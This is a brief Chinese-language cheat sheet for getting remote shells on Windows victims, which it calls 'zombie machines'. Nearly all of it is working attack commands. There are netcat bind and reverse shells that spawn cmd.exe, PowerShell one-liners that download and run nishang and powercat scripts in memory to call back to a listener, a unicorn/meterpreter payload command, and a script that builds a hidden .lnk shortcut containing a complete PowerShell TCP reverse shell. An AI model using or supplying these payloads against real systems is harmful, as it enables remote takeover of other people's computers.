NC 反彈 shell
攻擊場景:
Victim IP: 192.168.2.10
Attacker IP:192.168.2.11
正向 Shell
我們想要彈回Victim的Shell,使用如下命令:
Victim:nc -lvp 9999 -e cmd.exe
Attacker:nc 192.168.2.10 9999
ps:先在肉雞上開一個cmd服務,然后在攻擊機上進行連接
反向 Shell
Attacker:nc -vlp 9999
Victim:nc 192.168.2.11 9999 -e cmd.exe
ps:先在攻擊機上進行監聽,然后在肉雞上給Attacker開一個cmd
PowerShell 反彈 shell
反向 shell
監聽主機:nc -vlp 9999
目標執行:內存加載遠程腳本,相當於遠程代碼執行
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 監聽主機ip -Port 9999"
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 監聽主機ip -p 9999 -e cmd.exe"
python unicorn.py windows/meterpreter/reverse_http 17.10.0.1 4455 msfconsole -r unicorn.rc
powershell生成payload快捷方式
$WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("c:\lnk_tests\payload.lnk") $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" $Shortcut.Arguments = '-windowstyle hidden /c $client = New-Object System.Net.Sockets.TCPClient("""192.168.1.10""",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + """PS """ + (pwd).Path + """> """;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' $Shortcut.Save()